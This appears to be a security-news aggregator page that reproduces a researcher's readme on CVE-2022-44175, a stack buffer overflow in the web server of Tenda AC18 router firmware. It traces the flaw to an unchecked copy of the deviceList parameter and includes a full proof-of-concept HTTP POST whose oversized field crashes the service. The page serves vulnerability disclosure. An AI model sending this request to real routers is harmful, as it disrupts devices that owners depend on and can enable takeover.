Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-44175: IoT_vuln/readme.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg.

CVE
Open in Source
#vulnerability#mac#windows#buffer_overflow#firefox

Permalink

Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product

  1. product information: https://www.tenda.com.cn/
  2. firmware download: https://www.tenda.com.cn/download/detail-2683.html

Affected version

V15.03.05.19

Vulnerability

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetMacFilterCfg function, which can be accessed through the URL goform/SetMacFilterCfg.

Go to the function sub_C1334

Go to the function sub_C15F8

In formSetMacFilterCfg function, deviceList is controllable and finally will be passed into the sub_C15F8 function.

In the sub_C15F8 function, it is worth noting that there is no size check, which leads to a stack overflow vulnerability.

PoC

POST /goform/setMacFilterCfg HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/iptv.html?random=0.7642888131213508& Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcmho1qw

macFilterType=1&deviceList=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE